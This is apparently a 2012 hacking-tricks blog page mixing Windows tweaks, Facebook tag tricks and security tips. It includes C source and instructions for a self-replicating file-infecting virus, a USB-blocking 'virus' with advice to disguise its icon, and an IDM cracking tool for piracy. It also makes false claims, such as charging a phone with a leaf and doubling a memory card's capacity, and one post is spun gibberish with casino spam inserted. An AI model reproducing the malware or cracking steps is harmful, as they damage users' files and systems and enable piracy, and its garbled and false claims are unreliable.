Sunday 23 December 2012

The magic number trick just like any other facebook trick, allows a user to generate some sort of a code to tag the title of an intended page or group. But now it seems like some facebook are now using the same trick as a spammy way of advertising their facebook pages and groups. Viewed from a real perspective, these magic numbers are nothing but a unique ID number of  facebook UsersPages or Groups.

How it Works?
1. Login to your facebook account
2. Then Go to any profile, group or page of your choice
3. If for example you open a page, look at the url in your browser's address bar and get the ID from there as shown in the image below.

4. Now copy the ID Number and replace ''ID'' with it in the following code;


In this example, Since my ID number is ''244744025579987'' therefore my code altogether will be;


5. Now, ask your friends to copy and paste the above code into their comment box and remove the plus+ sign so that it looks like this @[244744025579987:0] then hit Enter or click the share button and see the magic!!!

NOTE : The above code has just been used as an example, you can  use the same basic knowladge to generate a code of your own depending on the page of your choice.

Enjoy :D

Friday 21 December 2012

1) Make New Folder And Name it what You want..

2) Now open that Folder and Right click in that

3) Now goto New > Text Document

4)Now Name it Lock.txt

Now copy and paste following Code in that notepad

Quote: cls
title Folder Private
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST Private goto MDLOCKER
echo Are you sure you want to lock the folder(Y/N) (By
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
ren Private "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked
goto End
echo Enter password to unlock folder (By
set/p "pass=>"
if NOT %pass%== password here goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Private
echo Folder Unlocked successfully
goto End
echo Invalid password
goto end
md Private
echo Private created successfully
goto End

5)After u copy the command go to line ( 23 ) u will find "password here" Change to any password u want.

6)After that, save it as locker.bat (the txt file will change to an application file)

7)Now go back to the folder & u will find a this locker.bat file.
8)Click on it & u will find a new folder called Private

9)Now copy what u want in it & after that go to locker.bat by clicking it, it will open and ask you if you want to lock your folder? Y/N ?

10)Type Y

11)If you want to UNLOCK your folder, go open locker.bat & type your password and the Private folder will be made visible again.

1. Start regedit ie; Start->Run->regedit

2. Navigate to HKEY_CLASSES_ROOT\lnkfile

             If you find difficult in reaching this file location, simply Press Ctrl+F to open find window. Enter "IsShortcut" and click find. now Press f3 till you get the file Inkfile located at Hkey_Classes_Root\Inkfile

3. Delete the IsShortcut registry value.

You may need to restart Windows XP.

If You are Regular or often User of Computer you will have Heard or see about Resolution about Desktop Screen or laptop Screen. This screen's Resolution's Real meaning is as below.

Resolution Size and Full-Form

VGA- Video Graphic Array (640 X 480)

SVGA - Super Video Graphic Array (800 X 600)

XGA - eXtended Graphic Array (1024 X 768)

SXGA - Super eXtended Graphic Array (1280 X 1024)

UXGA - Ultra eXtended Graphic Array (1600 X 1200)

Now after reading the above Secrets you can choose your own resolution without any Experts help.  (Rahul Patil)

Facts About Bill Gates

1. Bill Gates earns US$250 every SECOND, that's about US$20 Million a DAY and US$7.8 Billion a YEAR!

2. If he drops a thousand dollar, he won't even bother to pick it up bcoz the 4 seconds he picks it, he would've already earned it back.

3. The US national debt is about 5.62 trillion, if Bill Gates were to pay the debt by himself; he will finish it in less then 10 years.

4. He can donate US$15 to everyone on earth but still be left with US$5 Million for his pocket money.

5. Michael Jordan is the highest paid athlete in US. If he doesn't drink and eat, and keeps up his annual income i.e. US$30 Million, he'll have to wait for 277 years to become as rich as Bill Gates is now.

6. If Bill Gates was a country, he would be the 37th richest country on earth.

7. If you change all of Bill Gate's money to US$1 notes, you can make a road from earth to moon, 14 times back and forth. But you have to make that road non-stop for 1,400 years, and use a total of 713 BOEING 747 planes to transport all the money.

8. Bill Gates is 40 this year. If we assume that he will live for another 35 years, he has to spend US$6.78 Million per day to finish all his money before he can go to heaven.

Last but not the least: If Microsoft Windows' users can claim US$1 for every time their computers hang because of Microsoft Windows, Bill Gates will be bankrupt in 3 years !!!!!!! !!!!

Hey Guys.. This is Rahul Patil... and I am back with my New trick.. Create a Send to Menu Shortcut..
Now send any file to your Folder directly via Send to Menu...

Follow the Steps...

First you’ll need access to hidden files. So change your view settings to make all hidden files visible.

In My Computer..
Tools -> folder options -> view (tab) and select the show hidden files and folders.

go to parent drive:/documents and settings/(user name)/send to

Open up my computer and locate your most used folders.

Create a shortcut of the most used folders in SEND TO FOLDER. (You can do this in a number of ways.)

Right click -> send to desktop(create shortcut) and move the shortcut from the desktop to the SEND TO FOLDER

Copy the most used folder and go to SEND TO FOLDER and right click -> paste shortcut.

Also remember to rename the shortcuts to send to videos or send to photos. You don’t need confusion when You use the same later.


Malware, short for malicious software, is software designed to secretly access a computer system without the owner's informed consent. The expression is a general term used by computer professionals to mean a variety of forms of hostile, intrusive, or annoying software or program code.The term "computer virus" is sometimes used as a catch-all phrase to include all types of malware, including true viruses. [Wikipedia]

With the increase in malware "programmers", numerous malwares/spywares are releasing everyday.

Here are some ways to stay safe from most malwares in Windows:

1. OS Installation Directory

Most of them are skids, so they hard-code location names in their apps, instead of getting the System Directory. As you know the default installation of Windows XP, Vista, 7 is C:\Windows. When you are installing an OS, you are asked for the installation location, even Directory name. Just change C:\Windows to something like E:\OSdir, etc. and you should be immune from skid malwares.

Note: Some softwares may stop working this way, since it can be possible that they are using the same idea. Just find an alternative for them.

2. Show Hidden Folders, and System Files

It is really easy to make any file System/Hidden in most programming languages, so most malwares hide their stub using these attributes. It becomes real easy to find them after you unhide them.

3. Use BinText on suspicious apps

You have found a suspiciously hidden App? Open it in BinText, it will display all Text in the app. Most programmers don't hide Text, although it can be done by obfuscating. But there is still a very good chance you can find suspicious information in an app. If you find text like ", , etc" then the app is a malware/spyware.

Download BinText now from Official Site

4. Process in Task Manager

Most of the Malwares cannot hide their task from TaskManager. All they do is Disable Task Manager by creating a Key in Registry. Just Download another Task Manager, there are lots, or make one yourself (Google for that), and you can End the Process of the suspicious app.

These are some basic tips that can help you to stay safe from most malwares.

My friend recently bought a Toshiba laptop, but it was stolen within a couple days. The good thing is that i had installed a tracing software on his laptop the very same day he bought it, and he had no troubles finding it. This can happen to anyone which is using laptop, so having a tracing software installed on your laptop is not a bad idea.

Here i am showing you a free laptop tracing software called Prey.

Prey lets you keep track of your phone or laptop at all times, and will help you find it if it ever gets lost or stolen. It's lightweight, open source software, and free for anyone to use. And it just works.
 How it Works?

Basically you install a tiny agent in your PC or phone, which silently waits for a remote signal to wake up and work its magic.

This signal is sent either from the Internet or through an SMS message, and allows you to gather information regarding the device's location, hardware and network status, and optionally trigger specific actions on it.

Notice: This file is Trojan as detected by some antivirus, but the thing is every such files are called trojan, as the process is to Track your system and view your systems reports. But be secure, this file is not harmful for your system or for your personal information. This software is made By PRey Project Company, and they take responsibility of it.

How to Download and Install Prey?

1. First of all download Prey project file from here.

2. After Downloading, Install the File and than

- They will ask for either standalone and +control panel.
- Go for +control panel, and than Click For New User.
- Give Your Name, Your Email and select Password to login the site.

E.g, Name :- Rahul Patil
Password:-123456 (any Password that you choose) for Entering the site, and than press ok.

- You will get Email from prey project, just activate your account there, and click your device and do the following settings:
 If you "on" any of the above settings than be sure to remember password of "lock pass". It will show as the tym you make it on. Just below the lock it will be written pass, and when alert is on the message will display whenever you login, "this laptop is stolen ...."-lol

So these were all steps now you can install and get secure. Now if its get stolen than you can track back

This still has demerit E.g, If theif formats your system completly than its no way possible to get back than to ask for police, and they don't track laptop normally, until the stolen system is related with some serious case.

How to Detect Fake Mails:

1. Lets get back to the example I illustrated in my article Fake Mailer. I had used "" as the sender email address. No doubt, this was fake and the receiver will get the fake email sent by me.

2. Suppose you are the receiver. Now, I will tell you how to recognize this mail as fake. Open the email and hit on "Show Details".

3. Something you must know:
 Whenever Google sends you any email, the email details will contain fields like:

- Mailed by
- Signed by (optional)

Also, most of the times, "Mailed by" field will have value:

* or

depending on the type of your mail. This is true for every genuine email from every mail provider.

4. But, these two fields will not be present in the details of Fake Mail. Also, if the mail details contain these fields, the value of these fields will not be *

Fake Mail without "Mailed by" field:

Fake Mail with "Mailed by" field.
 As you can see, the "mailed by" field shows the hosting server's name and not the Google server. This means, this server is used to send you the fake email and most probably, the fake mailer is hosted on the same server.

You can also check out the header field to detect fake mails. Follow the steps:

- Open the mail. Hit on down arrow next to "Reply" and click on "Show Original".

- Now, check out "Received" fields. This field will show you the name of server from which the mail is sent. As you can see, we have used "" as our fake mailer. So, it has appeared in "Received" field.

More Tips:

- Fake Mail usually have attractive titles.
- Such mails address receiver as "Dear Customer" or such and do not use your real name.
- Never click on any link in emails. Instead, open such links manually in new tab

we all know that a slow internet connection really costs time and makes feel annoying . many friends ask me the ways to increase their internet speed.however . it's possible to do to some extent and make your internet
much better then it was in the past.

There are Two tricks that will help you to increase your internet speed..

First Method- Speed Up Your Net Speed By 20%

1. First you go to start button

2. Go To Run

3. Type gpedit.msc And Then Hit Enter.

4.Then Expand Adminsitrative Templates.

5.Then Network

6.Then QoS Packet Scheduler.

Now A New List Appear . Click On Limit Reservable Bandwidth.
Just Disable it.

Now You Click On Apply .

That's It Now You Are Done !! :)

Now Just Restart Your Computer . And I hope You will Get change in Your Speed

Some Basic Tricks From My Side-
1. Use IDM To Boost Your Downloading Speed.

2. Use A Good Anti-virus in Your Computer.
3. Remove Unwanted Add-ons, Software,Unwanted Files Form Your Computer.

4.Update Your Drivers Periodically.

5.Keep A Good Maintennance Of Your Computer.

So I Hope this tricks was useful for you !!

Thursday 20 December 2012


Now reacharge your mobile with a leaf atteach with leaf of your mobile battery few mintes your mobile battery will be charged


-Insert the memory card, dont access yet through your phone.
-Open file explorer and locate c: system Look for a file named MMCSTORE.
-Rename this file to mmcstore.txt
-Copy the file mmcstore.txt and send it to your computer
-Now open that file in notepad -
When you are finished you would find the password there.......



Security tips:-If you are using social networking sites
1.If you use your email id with facebook,orkut etc make sure that your mail id and facebook,orkut password is not same
2.Use temporary email for social networking sites-if you use facebook or other social networking sites then you must use a temporary email id.For your important work purpose usf personal mail id
3.Security Question-when ever you register on any site you have to fill the security question for recovery purpose.Some security question like"whats ur moms birth place" etc so in that security question fill any string or text rather than actual answer

1. Insert the memory card to your PC
2. Keep a back up of all the data from the memory card, because first you have to format the card
3. Download and install Skymedi software go to
4. After installation, the application will launch automatically showing a windows with options ¡° Fix ¡± and ¡° Cancel ¡±. From the drop down menu, you have to browse the memory card
5. Once you select the location of the card, click on ¡° Fix ¡±, it willask you for the confirmation, you have to click on ¡° Yes ¡±. After selecting the memory card, the application will show you a size of around 955MB ; this is because you have inserted a 1GB memory card
6. After finishing the process, the application will ask you to unplug the memory card.
Remove it and insert it again. Now the storage capacity of thememory card is increased to 2GB
7. If you want to check the storage of the memory card you can click on My computer --> Memory card --> Select Properties . You will see that the size of the memory card is 2GB. If you are using Windows Vista7, you will see ¡ Computer ¡± instead of ¡° My computer ¡±. Open that right clicks on the memory card, select properties and you will be able to check the size of the memory card
8. There is one more way to confirm the storage capacity. Reopen the Skymedi and select the location of the memory card. This time it will show 1912KB, which is 2GB

How to Use Multiple Facebook Accounts in Google Chrome

*.Firstly open Google Chrome and login into your first Facebook Account.
*.Then right click on the Facebook home link present at the top left corner and click on open link in incognito window.
*.That's all, you are done! Now a new window will appear asking you to login into your Facebook account. So, it is really simple in Google Chrome to do so ! |

Facebook is always at the top of Hacker’s list due to its large popularity, ease to use, connects large number of people,  large collection of applications, many more. Facebook was launched in 2004, as of January 2011, it had more than 600 million active user. A hacker can get many useful information about anyone with Hacking his or her Facebook Account and can destroy anyones social life with it. Due to large number of attacks on Facebook everyday, it is trying to deeply secure its data from attackers. Many new awesome security feature had been built to secure its users, but loophole is always there.
Some days before Facebook had built a new security feature, it is Login Approval  similar to 2-Step Verification. As I have already mentioned a post about 2-Step verification, if you have read that post then you must have some knowledge about it. Anyways back to the post.
What is Login Approval?
Login Approvals is an opt-in security feature similar to Login Notifications, but with an extra security step. With Login Approvals, each time you try to access your Facebook account from an unrecognized device (ex: any computer or mobile phone you haven’t named and saved to your Facebook account), you will first have to enter a security code that’s been sent to your mobile phone.
How to turn on Login Approval?
To turn on Login Approval in Facebook
  • Go to your Account Settings page and select the change option next to Account Security.
  • Check the box under Login Approval ( If you don’t have a mobile phone number linked to your Facebook account, you will need to add one).
  • If you are haven’t named the device you are on, you will be prompted to do so when you turn on Login Approvals. Do not click the “Save this device” option if you are using a public device (ex: a friend’s phone, a library computer). Note that all of the devices linked to your Facebook account (ex: your recognized devices) are listed under the Login Approvals section.
What will happen after turning on the Login Approval?
After turning on this feature whenever you will login to your Facebook Account from any other unrecognized devices you will be ask to enter a security code which will be sent to your mobile.
You will see something like this:

1.   Use protection software "anti-virus software" and keep it up to date.

Make sure you have anti-virus software on your computer! Anti-virus software is designed to protect you and your computer against known viruses so you do not have to worry. But with new viruses emerging daily, anti-virus programs need regular updates, like annual flu shots, to recognize these new viruses. Be sure to update your anti-virus software regularly! The more often you keep it updated, say once a week, the better. Check with the web site of your anti-virus software company to see some sample descriptions of viruses and to get regular updates for your software. Stop viruses in their tracks!
2.   Do not open e-mail from unknown sources.

A simple rule of thumb is that if you do not know the person who is sending you an e-mail, be very careful about opening the e-mail and any file attached to it. Should you receive a suspicious e-mail, the best thing to do is to delete the entire message, including any attachment. Even if you do know the person sending you the e-mail, you should exercise caution if the message is strange and unexpected, particularly if it contains unusual hyperlinks. Your friend may have accidentally sent you a virus. When in doubt, delete!
3.   Use hard-to-guess passwords.

Passwords will only keep outsiders out if they are difficult to guess! Do not share your password, and do not use the same password in more than one place. If someone should happen to guess one of your passwords, you do not want them to be able to use it in other places. The golden rules of passwords are:
  • A password should have a minimum of 8 characters, be as meaningless as possible, and use uppercase letters, lowercase letters and numbers, e.g., xk28LP97.
  • Change passwords regularly, at least every 90 days.
  • Do not give out your password to anyone!
4.   Protect your computer from Internet intruders -- use "firewalls."

Equip your computer with a firewall! Firewalls create a protective wall between your computer and the outside world. They come in two forms, software firewalls that run on your personal computer and hardware firewalls that protect a number of computers at the same time. They work by filtering out unauthorized or potentially dangerous types of data from the Internet, while still allowing other (good) data to reach your computer. Firewalls also ensure that unauthorized persons can't gain access to your computer while you are connected to the Internet. You can find firewall hardware and software at most computer stores nationwide. Do not let intruders in!
5.   Do not share access to your computers with strangers. Learn about file sharing risks.

Your computer operating system may allow other computers on a network, including the Internet, to access the hard-drive of your computer in order to "share files". This ability to share files can be used to infect your computer with a virus or look at the files on your computer if you do not pay close attention. So, unless you really need this ability, make sure you turn off file-sharing. Check your operating system and your other program help files to learn how to disable file sharing. Do not share access to your computer with strangers!
6.   Disconnect from the Internet when not in use.

Remember that the Digital Highway is a two-way road. You send and receive information on it. Disconnecting your computer from the Internet when you are not online lessens the chance that someone will be able to access your computer. And if you have not kept your anti-virus software up-to-date, or don't have a firewall in place, someone could infect your computer or use it to harm someone else on the Internet. Be safe and disconnect!
7.   Back up your computer data.

Experienced computer users know that there are two types of people: those who have already lost data and those who are going to experience the pain of losing data in the future. Back up small amounts of data on floppy disks and larger amounts on CDs. If you have access to a network, save copies of your data on another computer in the network. Most people make weekly backups of all their important data. And make sure you have your original software start-up disks handy and available in the event your computer system files get damaged. Be prepared!
8.   Regularly download security protection update "patches."

Most major software companies today have to release updates and patches to their software every so often. Sometimes bugs are discovered in a program that may allow a malicious person to attack your computer. When these bugs are discovered, the software companies, or vendors, create patches that they post on their web sites. You need to be sure you download and install the patches! Check your software vendors' web sites on a regular basis for new security patches or use the new automated patching features that some companies offer. If you don't have the time to do the work yourself, download and install a utility program to do it for you. There are available software programs that can perform this task for you. Stay informed!
9.   Check your security on a regular basis. When you change your clocks for daylight-savings time, reevaluate your computer security.

The programs and operating system on your computer have many valuable features that make your life easier, but can also leave you vulnerable to hackers and viruses. You should evaluate your computer security at least twice a year -- do it when you change the clocks for daylight-savings! Look at the settings on applications that you have on your computer. Your browser software, for example, typically has a security setting in its preferences area. Check what settings you have and make sure you have the security level appropriate for you. Set a high bar for yourself!
10. Make sure that anyone who shares your computer knows what to do if your computer becomes infected.

It is important that everyone who uses a computer be aware of proper security practices. People should know how to update virus protection software, how to download security patches from software vendors and how to create a proper password. Make sure they know these tips too!

see the magic.

 copy the below and past it in chat window and see the magic:

[[501234119909794]] [[501234133243126]] [[501234126576460]] [[501234129909793]] [[501234123243127]]
[[501234263243113]] [[501234269909779]] [[501234273243112]] [[501234266576446]] [[501234276576445]]
[[501234423243097]] [[501234429909763]] [[501234439909762]] [[501234436576429]] [[501234433243096]]
[[501234559909750]] [[501234563243083]] [[501234569909749]] [[501234573243082]] [[501234576576415]]
[[501234829909723]] [[501234843243055]] [[501234833243056]] [[501234836576389]] [[501234839909722]]

Here’s how you change the title text that appears at the top of the Messenger window. By default, this is “Yahoo! Messenger”, followed by your status. Simply edit the ymsgr.ini file, which you will find in the same folder as the Messenger program, in your Program Files folder. Locate the file and open it in Notepad. Then, at the end, add the following:

caption=YOUR TEXT
Here, “YOUR TEXT” is whatever you want in the title bar. Save the file and close Messenger. When you restart it you will see your text in the title bar.

Yes it is possible to change Adminstrator password both in Win XP and Vista without knowing it. If you somehow manage to login as an Administrator then you can change the password without knowing it.
Here’s the Step-By-Step instructions

1. Right-click on the “My Computer” icon on the desktop OR in the Start Menu.

2. Select the option “Manage”.

3. On the left pane expand the “Computer Management (Local) tree (if it is not already expanded)

4. Double click “Local Users and Groups” option From “System Tools” tree.

5. Click the “Users” option.

6. Now you will see the list of users on the right side pane, such as Administrator, Guest etc.

7. Right click the “Administrator” and select the option “Set Password” option.

8. Now you will see a warning message, Click on proceed.

9. Now the system asks you for “New Password” and “Confirm Password” .

10. After entering the password click on “OK”. The password is changed. That’s It!

Windows has a nice new Start menu, which you can customize more thoroughly than you could with the Start menu in any earlier version of Windows. Open the Taskbar And Start Menu Properties dialog box by right-clicking the taskbar and clicking Properties. On the Start Menu tab, select either the Start Menu option or the Classic Start Menu option to choose which version of the Start menu to use, and then click Customize. The Customize Start Menu dialog box appears; you use this box to customize how Windows displays the Start menu.

The following sections describe the most useful Start menu hacks. First you learn how to configure what does and does not appear on the Start menu. Then you learn how to prevent some programs from appearing on the frequently used programs list. You also learn how to restore the Start menu’s sort order when it’s not in alphabetical order.

Configuring the Start Menu’s Contents

Even though you can completely customize the Start menu in the user interface, power users and IT professionals will likely want to script Start menu customizations. Power users don’t want to reconfigure the Start menu every time they install Windows. IT professionals can use scripts to deploy these settings or configure them automatically when creating default user profiles.

If you want to script these settings, you need to know where to find them in the registry. All these settings are in the same place:
HKCU\Software\Microsoft\Windows\ CurrentVersion\Explorer\Advanced
The first section, “Classic Start Menu,” contains values that affect the classic Start menu. The second section, “New Start Menu,” contains values that affect the new Start menu, also known as the Start panel. Most of these settings are REG_DWORD values, but some are REG_SZ values. If the possible data for any of the settings includes 0×01, 0×02, and so on, that setting is a REG_DWORD value. If the possible data includes NO or YES, it’s a REG_SZ value.


0×00–Hide Administrative Tools
0×01–Display Administrative Tools

NO–Display Control Panel as link
YES–Display Control Panel as menu

NO–Display My Documents as link
YES–Display My Documents as menu

NO–Display My Pictures as link
YES–Display My Pictures as menu

NO–Display Printers as link
YES–Display Printers as menu

0×00–Don’t use personalized menus
0×01–Use Personalized Menus

NO–Display Network Connections as link
YES–Display Network Connections as menu

0×00–Show small icons in Start menu
0×01–Show large icons in Start menu

0×00–Disable dragging and dropping
0×01–Enable dragging and dropping

0×00–Hide Favorites
0×01–Display Favorites

0×00–Hide Log Off
0×01–Display Log Off

0×00–Hide Run command
0×01–Display Run command

NO–Don’t scroll Programs menu
YES–Scroll Programs menu


0×00–Hide Control Panel
0×01–Show Control Panel as link
0×02–Show Control Panel as menu

0×00–Disable dragging and dropping
0×01–Enable dragging and dropping

0×00–Hide Favorites menu
0×01–Show Favorites menu

0×00–Hide My Computer
0×01–Show My Computer as link
0×02–Show My Computer as menu

0×00–Hide My Documents
0×01–Show My Documents as link
0×02–Show My Documents as menu

0×00–Hide My Music
0×01–Show My Music as link
0×02–Show My Music as menu

0×00–Hide My Pictures
0×01–Show My Pictures as link
0×02–Show My Pictures as menu

0×00–Hide Network Connections
0×01–Show Network Connections as link
0×02–Show Network Connections as menu

0×00–Hide Administrative Tools
0×01–Show on All Programs menu
0×02–Show on All Programs menu and Start menu

0×00–Hide Help and Support
0×01–Show Help and Support

0×00–Hide My Network Places
0×01–Show My Network Places

0×00–Hide Manufacturer Link
0×01–Show Manufacturer Link

0×00–Hide Printers and Faxes
0×01–Show Printers and Faxes

0×00–Hide Run command
0×01–Show Run command

0×00–Hide Search command
0×01–Show Search command

0×00–Don’t scroll Programs menu
0×01–Scroll Programs menu

In this post I will show how to create a simple virus that disables/blocks the USB ports on the computer (PC). As usual I use my favorite C programming language to create this virus. Anyone with a basic knowledge of C language should be able to understand the working of this virus program.

Once this virus is executed it will immediately disable all the USB ports on the computer. As a result the you’ll will not be able to use your pen drive or any other USB peripheral on the computer. The source code for this virus is available for download. You can test this virus on your own computer without any worries since I have also given a program to re-enable all the USB ports.

1. Download the USB_Block.rar file on to your computer.

2. It contains the following 4 files.
  • block_usb.c (source code)
  • unblock_usb.c (source code)
3. You need to compile them before you can run it. A step-by-step procedure to compile C programs is given in my post - How to Compile C Programs.
3. Upon compilation of block_usb.c you get block_usb.exe which is a simple virus that will block (disable) all the USB ports on the computer upon execution (double click).

4. To test this virus, just run the block_usb.exe file and insert a USB pen drive (thumb drive). Now you can see that your pen drive will never get detected. To re-enable the USB ports just run the unblock_usb.exe  (you need to compile unblock_usb.c) file. Now insert the pen drive and it should get detected.

5. You can also change the icon of this file to make it look like a legitimate program. For more details on this refer my post – How to Change the ICON of an EXE file (This step is also optional).

I hope you like this post. Please pass your comments.

How would you like to change the logon screen background in Windows 7 so as to give your Windows a customized look and feel? With a small tweak it is possible to customize the Windows 7 logon screen and set your own picture/wallpaper as the background. Changing logon screen background in Windows 7 is as simple as changing your desktop wallpaper. Well here is a step by step instruction to customize the logon screen background.

1. The image you need to set as the background should be a .jpg file and it’s size should not exceed 245KB.

2. The image resolution can be anything of your choice. However I prefer 1440 x 900 or 1024 x 768. You can use any of the photo editing software such as Photoshop to compress and set the resolution for your image. Once you’re done, save this image as backgroundDefault.jpg.

3. You will need to copy this image to
You will need to create that path if it does not already exist on your computer.

4. Now open the Registry Editor (Start -> Run -> Type regedit) and navigate to the following key
If Background does not exist rightclick LogonUI, select New and then Key, and then name it Background. Now locate OEMBackground (listed on the right side). If it does not exist, right-click Background and select New and then DWORD and name it OEMBackground.

5. Double-click on OEMBackground and set the Value Data to 1.

6. Now log-off to see the new logon screen background. If you would like to revert back to the default background, just set the Value Data back to 0.

I hope you like this trick. Just try out and give your feedback!

This program is an example of how to create a virus in C. This program demonstrates a simple virus program which upon execution (Running) creates a copy of itself in the other file. Thus it destroys other files by infecting them. But the virus infected file is also capable of spreading the infection to another file and so on. Here’s the source code of the virus program.

#include<time.h> FILE *virus,*host;
int done,a=0;
unsigned long x;
char buff[2048];
struct ffblk ffblk;
clock_t st,end;
void main()
if(host==NULL) goto next;
printf(“Infecting %s\n”,ffblk.ff_name,a);
printf(“DONE! (Total Files Infected= %d)”,a);
printf(“TIME TAKEN=%f SEC\n”,



1. Load the program in the compiler, press Alt-F9 to compile


3. Note down the size of generated EXE file in bytes (SEE EXE FILE PROPERTIES FOR IT’S SIZE)

4. Change the value of X in the source code with the noted down size (IN THE ABOVE SOURCE CODE x= 89088; CHANGE IT)

5. Once again follow the STEP 1 & STEP 2.Now the generated EXE File is ready to infect
USING BORLAND C++ 5.5 (32-BIT) :
1. Compile once,note down the generated EXE file length in bytes
2. Change the value of X in source code to this length in bytes
3. Recompile it.The new EXE file is ready to infect


1. Open new empty folder


3. Run the virus EXE file there you will see all the files in the current directory get infected.

4. All the infected files will be ready to reinfect

That’s it

Wednesday 19 December 2012

1. First You Download IDM Cracker Tool.

2. Now Run IDM Cracker Tool

3. Now if you want to install the latest version of idm then first you need to hit on the update button and your idm will be automatically updates in to the latest version .

4. After Your IDM is Updates To The Latest Version . Just You Hit on the start button and it will start cracking your idm software within few seconds . and now your idm convert in full version .

That's It Now you are done.

I hope you find this trick helpful for you .

Our pcs and also email messages tend to be what we use on an every day basis in order to connect with others, so there is no uncertainty we have to discover ways to safeguard each of our pcs along with e-mail. On earth of insane individuals, you’ll find dozens of people who’re usually on the verge of coughing another woman’s email or even computer. Your work is to stay away from these people by making passwords that will other folks cannot find out there.
Security password Power and also associated Computer Stability Suggestions : What you ought to Know
Are you aware that dozens of people acquire messages broken in to everyday? Whatever they actually do can be hack into a person to enable them to e mail all of the individuals the contacts listing and provide these people his or her virus url regarding some kind. Normally it will be useless or even ineffective site simply holding out to interrupt your friends and families computers. A fantastic hint worthy of remembering is always to often get more contact information password one or more times a week. It’s also advisable to make an effort to persuade your entire family and friends to complete the same. Others perhaps transform on a consistent schedule, so they can actually stay away from hackers as well as spammers likewise. Many people even adjust their particular security passwords on their own laptop or computer every week, and that means you should do exactly the same.
Recommendations on fortifying passwords
Whenever conditioning passwords, you would like that it is different and certainly not related to your reputation. Try out thinking of an occasion something special took place and make use of that to be a part of passwords. Maybe you may test approaching of the special event which will take place you need to include that will within your pass word. Be sure to include amounts, additional correspondence, and cap in your account details to increase their strength. It could be very easy for many individuals to get their emails broken into his or her passwords just consist of their particular identify and several additional figures. Thus, stay away from these people by simply usually creating passwords tougher than ever before.
Apart from these table games, you can also get to play free slots games at the online casinos. Even in these free games, you can come across many forms of slot games like free slots Vegas games and many other forms of slot games. The online gambling websites are trying out some or the other ways in order to offer you with a delight at the online Holdem poker game and that’s why they have started providing mini clip poker games and some other flash games that initiates instant gaming. If you want to get some information regarding official poker rankings or any kinds of strategies to be followed at the poker games then you can get it through some online guides.
Anti virus computer software
What is wonderful concerning using an antivirus software program is that it can help you avoid all kinds of trojans in the future in close proximity to your pc. Be sure you not purchase too much, since which is detrimental for the mobile computer or perhaps Personal computer. Rather, We suggest that you simply obtain just one as well as learn how to use it as much as you can. In that way, you’ll be able to figure out how to always use that with regard to long term reference.
You’ll find a large number of people always trying to crack into your consideration, let alone make use of your e mail connections list for their personal gain. Through upgrading your own accounts along with including a good anti virus software for a system, you’ll be able to stay away from them. In order to be safe, after that undertaking the above mentioned the situation is vital for the level of privacy. Consequently, keep yourself far from these kinds of difficulties and initiate switching your passwords over a consistent foundation. This helps immensely about maintaining your own pictures as well as close friends secure. Be aware that folks are searching for sufferers to break into every day, consequently just remember to stay aware about they will.

There are a number of ways in which a hacker can get your passwords. The most common is a "brute force attack", in which a hacker simply slams a website with thousands of possible passwords for an account until one is accepted.
In a brute force hacking attack, three simple character changes is the difference between 2.23 hours and 2.21 years to crack your password. For a standard 7 letter password with just lower case letters, there are 8,031,810,176 possible combinations. That may seem like a lot, yet it would only take 2.23 hours to crack such a password using password cracking programs easily available over the web. Adding just 1 number, 1 upper case letter, and 1 symbol results in the password taking 2.21 years to crack.

A new social networking worm in the vein of Koobface is currently doing the rounds.
Unlike the majority of Facebook scams, this one actively infects your computer with malware instead of simply tricking you into taking surveys and passing on messages to other users.
The link in his Facebook chat from a friend pointed to an link. Typically when you go to a Facebook app page it prompts you to add the application and grant it permission to post on your behalf or read your profile data. The scary part about this one is that it immediately prompts you to download a “FacebookPhotos#####.exe” file with no prompting or clicking required.

The screen reads “Photo has been moved. This photo has been moved to other location. To view this photo click View Photo.” If your computer has not already downloaded the malware, the “View Photo” button will download the virus for you.
It is really unfortunate that Facebook scams are moving back towards spreading malware. Fortunately, users of Sophos Anti-Virus had proactive protection from this threat with both our HIPS and suspicious file detection technologies; this particular strain is now identified by Sophos as W32/Palevo-BB.
The good news is that, Facebook removed the malicious application from its service. But there are probably many more applications like this one making the rounds, so, as always, beware of unusual messages from friends whether they are in email, on their walls, or in an instant message.

Domain typo-squatting is commonly used to spread malware to users whom accidentally misspell a legitimate domain in their web browser. A new type of domain typo-squatting takes advantage of an omission instead of a misspelling.
A Doppelganger Domain is a domain spelled identical to a legitimate fully qualified domain name (FQDN) but missing the dot between host/subdomain and domain, to be used for malicious purposes. Doppelganger Domains have a potent impact via email as attackers could gather information such as trade secrets, user names and passwords, and other employee information.
Each company in the Fortune 500 was profiled for susceptibility to Doppelganger Domains and 151 companies (or 30%) were found to be susceptible. In large corporations, email usage is extremely high and the likelihood of some email being mis-sent is high which could result in data leakage.
Security researcher Peter Kim and Garrett Gee who set up doppelganger domains to mimic legitimate domains belonging to Fortune 500 companies say they managed to vacuum up 20 gigabytes of misaddressed e-mail over six months. The intercepted correspondence included employee usernames and passwords, sensitive security information about the configuration of corporate network architecture that would be useful to hackers, affidavits and other documents related to litigation in which the companies were embroiled, and trade secrets, such as contracts for business transactions.
WhitePaper : Doppelganger.Domains.pdf

Vulnerabilities are everywhere. Knowing where they are is useful, but knowing which one will be exploited is much more useful. Security professionals need to focus on real threats plaguing today’s practitioners and provide up-to-date statistics on actual attack data.
As part of its ongoing Hacker Intelligence Initiative (HII), Imperva monitors malicious online activity to help organizations understand the threat landscape. During a six month period from June 2011-November 2011, Imperva researched and analysed web attack traffic targeted against 40 different web applications.
Interestingly, most of the attacks which exploited application vulnerabilities converged into five common attack techniques.
Web attack technique #1: SQL Injection (SQLi)
SQL Injection (SQLi) is an attack technique that exploits a web application vulnerability in order to access the organisations’ data in an unauthorised manner.
Take for example a web form. A hacker exploiting a SQLi vulnerability could insert some computer code into the username field rather than the actual user’s name. The code could be as simple as ‘1=1’ or be much more sophisticated and attempt to bypass simple defence measures or gain certain knowledge about the system’s setup. A vulnerable application will process the code and start coughing up sensitive data.
SQLi in the wild
